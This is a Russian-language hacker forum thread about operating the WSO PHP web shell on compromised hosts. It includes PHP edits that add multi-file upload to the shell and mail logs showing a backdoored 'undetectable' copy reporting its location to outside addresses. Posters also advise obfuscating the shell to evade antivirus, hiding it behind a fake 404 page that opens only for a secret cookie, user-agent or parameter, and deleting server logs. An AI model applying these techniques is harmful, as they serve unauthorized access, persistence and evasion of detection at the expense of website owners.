WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    а после, в выпадающем меню, где выбирали за архивировать, появляется строчка Paste, ее нужно клацнуть!
     
    _________________________
  2. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Выбираю compress (пробовал и zip и tar.gz)
    Появляется строка с именем файла:
    wso_20150321_184812.zip
    Жму на кнопку >>
    Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>.
    Ничего не происходит, архив не появляется.
     
    #402 Sloneny, 21 Mar 2015
    Last edited: 21 Mar 2015
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка Paste, ее обязательно надо указать, а потом щелкайте по кнопе >>

    [​IMG]
     
    _________________________
    #403 winstrool, 21 Mar 2015
    Last edited: 21 Mar 2015
    magnathorax likes this.
  4. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Премного благодарен.
     
  5. xavior

    xavior Member

    Joined:
    3 Apr 2011
    Messages:
    1
    Likes Received:
    6
    Reputations:
    1
    Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда:

    [​IMG]
    [​IMG]

    Правим input аплоада

    HTML:
    <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='>>'></form><br  ></td>
    Далее строка примерно 522
    PHP:
    case 'uploadFile':
    ...
    .....
    break;
    Заменяем там блок на
    PHP:
    case 'uploadFile':
            if ( 
    is_array($_FILES['f']['tmp_name']) ) {
                    foreach ( 
    $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                            if(!@
    move_uploaded_file($tmpName$_FILES['f']['name'][$i])) {
                                    echo 
    "Can't upload file!";
                            }
                    }
            }
            break;
     
    #405 xavior, 23 Apr 2015
    Last edited: 23 Apr 2015
    M_script, BlueMarine, Law and 3 others like this.
  6. Maser_Montan

    Maser_Montan Banned

    Joined:
    11 Mar 2013
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    написали бы в чем отличия
     
    _________________________
  8. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    в присутствии бэкдора, пологаю :)
     
    d1kobraz and frank like this.
  9. 6agupa

    6agupa New Member

    Joined:
    8 May 2015
    Messages:
    27
    Likes Received:
    4
    Reputations:
    0
    https://code.google.com/p/wso-web-shell-2-8/

    Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
    А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
    Или это противоречит политике GitHub?
     
  10. H@rd

    H@rd Member

    Joined:
    18 May 2015
    Messages:
    27
    Likes Received:
    21
    Reputations:
    1
    Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой.

    Скриптом отправляется 2 письма на следующие адреса:
    [email protected], [email protected]

    X-Sendmail-Cmdline: sendmail.pl -t -i
    To: [email protected]
    Subject: array localhost/WSO2.8_undetectable.php
    X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code

    localhost/WSO2.8_undetectable.php

    X-Sendmail-Cmdline: sendmail.pl -t -i
    To: [email protected]
    Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1
    X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code

    Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1<br>
     
    M_script, profishell, Swat2k and 4 others like this.
  11. 6agupa

    6agupa New Member

    Joined:
    8 May 2015
    Messages:
    27
    Likes Received:
    4
    Reputations:
    0
    Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2?
    Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.
     
    _________________________
    6agupa and 3ran like this.
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    И что же ты изменил? Испортил дизайн и добавил бесполезную хуйню?
     
    _________________________
    grimnir likes this.
  14. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    39
    Likes Received:
    19
    Reputations:
    5
    Сделай описание что нового ты добавил в эту версию.
     
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы.

    1)
    Code:
    -/* WSO 2.1 (Web Shell by oRb) */
    +/* WSO 2.2.0 (Web Shell by oRb) */
    2)
    Code:
    -/* WSO 2.2.0 (Web Shell by oRb) */
    +/* WSO 2.2.0 (Web Shell by Pirat) */
    3)
    Code:
    -/* WSO 2.2.0 (Web Shell by Pirat) */
    +/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
    4)
    Code:
    -$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
    +$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
    5)
    Code:
    -$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
    +$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
    PS Для чего была вставлена строка?
     
    #415 b3, 20 Jul 2015
    Last edited: 20 Jul 2015
    YaBtr, 6agupa and yarbabin like this.
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
     
    _________________________
    frank and grimnir like this.
  17. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Отличая идея,что-то не подумал сразу.
     
    _________________________
  18. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    И палить шелл GET-ом, а про cookie, user-agent, accept-language и т.п. уже забыли.
     
    _________________________
  19. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    http://kronus.me/cn/wso-builder/1.04/
    понравилась онлайн версия билдера wso
    возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
    и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
     
  20. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи

    в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов